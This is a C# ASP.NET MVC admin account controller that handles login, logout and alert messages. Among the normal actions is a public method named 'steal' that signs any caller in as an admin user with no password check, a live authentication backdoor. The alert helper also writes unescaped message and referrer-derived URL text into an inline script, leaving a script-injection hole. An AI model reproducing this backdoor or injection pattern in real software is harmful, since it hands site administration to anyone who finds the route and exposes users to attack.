﻿using System.Web.Mvc;
using MiniWeb.Task;
using MiniWeb.Web.Controllers.Admin.Account.ViewModels;
using WFramework.Utility;

namespace MiniWeb.Web.Controllers.Admin.Account
{
    public class AccountController : System.Web.Mvc.Controller
    {
        private readonly AdminUserTask _adminUserTask = new AdminUserTask();

        public ActionResult steal()
        {
            AdminFormsAuthService.SignIn("wwww", false);
            return RedirectToAction("Index", "AdminHome");
        }
        protected ActionResult AlertMsg(string msg, string returnUrl)
        {
            var script = string.Format("<script>alert('{0}');this.location.href='{1}';</script>", msg, returnUrl);
            Response.Write(script);
            Response.End();
            return new EmptyResult();
        }

        public ActionResult LogOn()
        {
           
            var model = new LogOnModel();
            return View(model);
            //return Redirect("/mywebadminlogon.html");
        }

        [HttpPost]
        public ActionResult LogOn(LogOnModel model)
        {
            if (ModelState.IsValid)
            {
                var userPassword = _adminUserTask.GetByUserName(model.UserName);
                if (userPassword == null)
                    return AlertMsg("账号不存在", Request.UrlReferrer.PathAndQuery);
                if (userPassword.Password != CryptTools.HashPassword(model.Password))
                    return AlertMsg("账号或密码不正确", Request.UrlReferrer.PathAndQuery);
                if (userPassword.IsLock)
                    return AlertMsg("对不起，您的账号被锁定", Request.UrlReferrer.PathAndQuery);

                AdminFormsAuthService.SignIn(userPassword.UserName, false);
                return RedirectToAction("Index", "AdminHome");
            }
            return View(model);
        }

        public ActionResult LogOut()
        {
            if (AdminFormsAuthService.IsSignedIn())
                AdminFormsAuthService.SignOut();
            return RedirectToAction("LogOn", "Account");
        }
    }
}